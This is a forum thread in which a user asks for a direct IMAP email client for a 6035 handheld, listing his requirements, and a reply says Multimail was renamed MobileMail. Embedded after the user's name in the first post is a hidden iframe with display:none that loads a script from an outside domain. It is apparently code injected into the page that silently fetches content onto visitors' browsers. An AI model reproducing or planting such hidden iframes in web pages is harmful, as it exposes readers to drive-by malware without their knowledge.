+ Reply to Thread

No more multimail (or, what is the best IMAP-direct client?)

After doing searching for what imap clients people like around here, I had finally decided that most of the buzz centered around multimail.

But, it seems that multimail has been discontinued, or at least I can't find it.

So, my question.. what's the best thing out there?

My needs:

1) no middle-server. I'm currently trying out some programs (thinair, basejet) that require connections to their server, which then connects to my imap server. There have been a number of times that the middle server has been down and I haven't been able to get to my email, or other problems have arisen from having the middle server. I'd like to get around that if at all possible.

2) I'd prefer a non subscription service. I suspect that my desire for 1) will take care of this issue, but I'm going to throw this out there anyway.

3) Don't really care all that much about attachments. I don't get many of them (i'm in a unix shop) and the ones I do get can wait until I get back to the office.

4) cheaper is better, but that goes without saying as long as the needs are met.

There's a fair amount of buzz about snappermail, but it doesn't support imap. Oh, and I've got a 6035, so versamail, which seems to be ok, at least on paper, won't work because it requires OS 4.1.

Thanks,

Kirby<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    -- Everything I say is pure speculation.

Re: No more multimail (or, what is the best IMAP-direct client?)

Originally posted by kvandivo
    After doing searching for what imap clients people like around here, I had finally decided that most of the buzz centered around multimail.

But, it seems that multimail has been discontinued, or at least I can't find it.

So, my question.. what's the best thing out there?

My needs:

1) no middle-server. I'm currently trying out some programs (thinair, basejet) that require connections to their server, which then connects to my imap server. There have been a number of times that the middle server has been down and I haven't been able to get to my email, or other problems have arisen from having the middle server. I'd like to get around that if at all possible.

2) I'd prefer a non subscription service. I suspect that my desire for 1) will take care of this issue, but I'm going to throw this out there anyway.

3) Don't really care all that much about attachments. I don't get many of them (i'm in a unix shop) and the ones I do get can wait until I get back to the office.

4) cheaper is better, but that goes without saying as long as the needs are met.

There's a fair amount of buzz about snappermail, but it doesn't support imap. Oh, and I've got a 6035, so versamail, which seems to be ok, at least on paper, won't work because it requires OS 4.1.

Thanks,

Kirby
    The name has been changed to MobileMail. Not sure if it is available for the 6035, but it ships with the 7135.

Alan